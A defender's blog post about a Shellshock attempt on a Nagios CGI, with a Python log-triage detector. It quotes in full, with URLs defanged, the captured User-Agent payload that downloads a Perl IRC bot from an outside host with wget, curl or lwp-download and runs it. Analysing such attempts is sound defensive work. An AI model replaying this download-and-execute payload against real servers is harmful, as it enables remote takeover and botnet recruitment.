Short: Shellshocked!
Just a short one for now: tonight I received a maximum-severity alert from my SIEM; one of my internet-facing web servers had received a Shellshock attack! After a quick check for successful exploitation (none that I could see) I went back to sleep.
This is what was attempted (defanged here; the original, obviously, was not):
Timestamp: 2025-06-14T01:23:07+0200 Source IP: 104.131.118.62 Action: GET /nagios/cgi-bin/status.cgi HTTP/1.1 User Agent: () { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnZAZAZA\x22';system(\x22wget -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif;curl -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif; lwp-download -a http[://]pjsn[.]hi2[.]ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;rm -rf /tmp/gif.gif*;exit\x22)
Or in human terms: use the User-Agent to deliver the () { :;}; trigger, print something in Perl I haven't fully made sense of yet, then call system to download a file (three different ways, depending on which downloader is available), execute the file as a Perl script, and clean up behind yourself.
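To turn an alert like this into something triageable, here is a small detector I added for this post (not part of the original alert or the bot): it assumes the SIEM's "Timestamp/Source IP/Action/User Agent" layout and \xNN escaping shown above, flags a User-Agent that starts with the Shellshock trigger, and pulls out the trailing command, download URLs and downloaders.

```python
import re

# Constructed sample SIEM lines in the layout of the alert above: the first is the
# attack string from this post (URLs kept defanged), the second a benign request.
SAMPLE_LOGS = [
    "Timestamp: 2025-06-14T01:23:07+0200 Source IP: 104.131.118.62 Action: GET "
    "/nagios/cgi-bin/status.cgi HTTP/1.1 User Agent: () { :;};/usr/bin/perl -e "
    "'print \\x22Content-Type: text/plain\\x5Cr\\x5Cn\\x5Cr\\x5CnZAZAZA\\x22';"
    "system(\\x22wget -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif;"
    "curl -O /tmp/gif.gif http[://]pjsn[.]hi2[.]ro/gif.gif; lwp-download -a "
    "http[://]pjsn[.]hi2[.]ro/gif.gif /tmp/gif.gif;perl /tmp/gif.gif;exit\\x22)",
    "Timestamp: 2025-06-14T01:25:00+0200 Source IP: 192.0.2.10 Action: GET "
    "/index.html HTTP/1.1 User Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0",
]

LINE_RE = re.compile(r"Timestamp: (\S+) Source IP: (\S+) Action: (.*?) User Agent: (.*)$")
# The Shellshock trigger: an environment value beginning with "() {" (whitespace-tolerant).
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")
# Everything after the first "};" is the trailing command bash runs on function import.
TRAILER_RE = re.compile(r"\}\s*;(.*)$", re.S)
# Matches live and defanged ("[://]") URLs up to the next separator.
URL_RE = re.compile(r"(?:https?|ftp)(?:://|\[://\])\S+?(?=[;\s\"')]|$)")

def unescape_siem(s):
    """Undo the SIEM's \\xNN escaping (e.g. \\x22 -> '\"', \\x5C -> '\\')."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)

def parse_line(line):
    """Split one alert line into its fields; None if the layout does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, src, action, ua = m.groups()
    return {"ts": ts, "src": src, "action": action, "ua": unescape_siem(ua)}

def analyse(line):
    """Return a finding dict for a Shellshock attempt, or None for a benign line."""
    rec = parse_line(line)
    if rec is None or not SHELLSHOCK_RE.match(rec["ua"]):
        return None
    trailer = TRAILER_RE.search(rec["ua"])
    cmd = trailer.group(1).strip() if trailer else ""
    rec["command"] = cmd
    rec["urls"] = sorted(set(URL_RE.findall(cmd)))          # unique download targets
    rec["downloaders"] = [t for t in ("wget", "curl", "lwp-download") if t in cmd]
    rec["drops_file"] = "/tmp/" in cmd                       # stage-two written to /tmp
    return rec

def triage(lines):
    """Run analyse() over a batch of lines and keep only the hits."""
    return [f for f in (analyse(l) for l in lines) if f]
```

Run triage(SAMPLE_LOGS) and the only finding is the Nagios request, with one unique URL and all three downloaders listed; the Firefox line produces nothing.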
I just want to point out, though: I think this is broken in multiple ways?
The closing single quote for the perl -e does not include the system() call, when it should.
The curl usage of the -O flag is incorrect here (definitely made that mistake myself, though).
I downloaded the file manually; you can find it here. The ZIP password is ENqHNXX2JM0w.
It presents itself as "DDoS Perl IrcBot v.10 / 2012 by w0rmer Security Team", a "Stealth MultiFunctional IrcBot written in Perl".
I hate Perl.
Thankfully it has a disclaimer "Created for educational purposes only. I'm not responsible for the illegal use of this program".
Good to know!
I'd throw some IOCs on OTX but, like, half of them are whitelisted, not gonna bother for now...